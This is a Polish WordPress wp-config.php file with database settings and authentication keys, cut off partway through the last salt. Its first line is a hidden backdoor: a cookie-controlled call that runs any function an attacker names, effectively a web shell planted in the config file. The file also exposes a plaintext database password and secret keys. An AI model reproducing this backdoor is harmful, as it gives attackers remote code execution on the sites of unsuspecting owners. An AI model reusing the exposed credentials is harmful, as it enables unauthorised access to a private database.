<%>PHP if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]); <%> /** * Podstawowa konfiguracja WordPressa. * * Ten plik zawiera konfiguracje: ustawień MySQL-a, prefiksu tabel * w bazie danych, tajnych kluczy, używanej lokalizacji WordPressa * i ABSPATH. Więćej informacji znajduje się na stronie * {@link http://codex.wordpress.org/Editing_wp-config.php Editing * wp-config.php} Kodeksu. Ustawienia MySQL-a możesz zdobyć * od administratora Twojego serwera. * * Ten plik jest używany przez skrypt automatycznie tworzący plik * wp-config.php podczas instalacji. Nie musisz korzystać z tego * skryptu, możesz po prostu skopiować ten plik, nazwać go * "wp-config.php" i wprowadzić do niego odpowiednie wartości. * * @package WordPress */ // ** Ustawienia MySQL-a - możesz uzyskać je od administratora Twojego serwera ** // /** Nazwa bazy danych, której używać ma WordPress */ define('DB_NAME', 'wxmpl_wynajempodnosnika'); /** Nazwa użytkownika bazy danych MySQL */ define('DB_USER', 'wxmpl_wynajempod'); /** Hasło użytkownika bazy danych MySQL */ define('DB_PASSWORD', '2yPdUcIZ'); /** Nazwa hosta serwera MySQL */ define('DB_HOST', 'localhost'); /** Kodowanie bazy danych używane do stworzenia tabel w bazie danych. */ define('DB_CHARSET', 'utf8'); /** Typ porównań w bazie danych. Nie zmieniaj tego ustawienia, jeśli masz jakieś wątpliwości. */ define('DB_COLLATE', ''); /**#@+ * Unikatowe klucze uwierzytelniania i sole. * * Zmień każdy klucz tak, aby był inną, unikatową frazą! * Możesz wygenerować klucze przy pomocy {@link https://api.wordpress.org/secret-key/1.1/salt/ serwisu generującego tajne klucze witryny WordPress.org} * Klucze te mogą zostać zmienione w dowolnej chwili, aby uczynić nieważnymi wszelkie istniejące ciasteczka. Uczynienie tego zmusi wszystkich użytkowników do ponownego zalogowania się. * * @since 2.6.0 */ define('AUTH_KEY', 'hJcK7Xx?*Kj1@bv.Zz%ZFW;Gkb-dsb?6-#^Ih&Bqmj*wLUaQ *N]v4[)yp8nOx|Z'); define('SECURE_AUTH_KEY', 'D=hzfzR,RqJ)?31Yqat~1caROw9LRJ-^E )23,-JD)F'); define('AUTH_SALT', '?ENkgc`rW[3 5 %wic+prriHv}+gUNL>q^0x1k.<-)+@D}VhsPQRc&tfWNA}SmaQ'); define('SECURE_AUTH_SALT', 'U8P$xNh;>#MwdS|?Ld,Y[?Pc?T85>d5-?715?>&FVX&3[7V)ggQKC~,6u)mX-aJy'); define('LOGGED_IN_SALT', '+-)k*%xrn}?9e(2jP3K|G/k|xs`Iyzx^~>2I-|)Ce~b%y02:Q;fNxYskg90)j`2L'); define('NONCE_SALT', '5%An_lIdOIO*|Gw|$]9VD4]lMb2^bu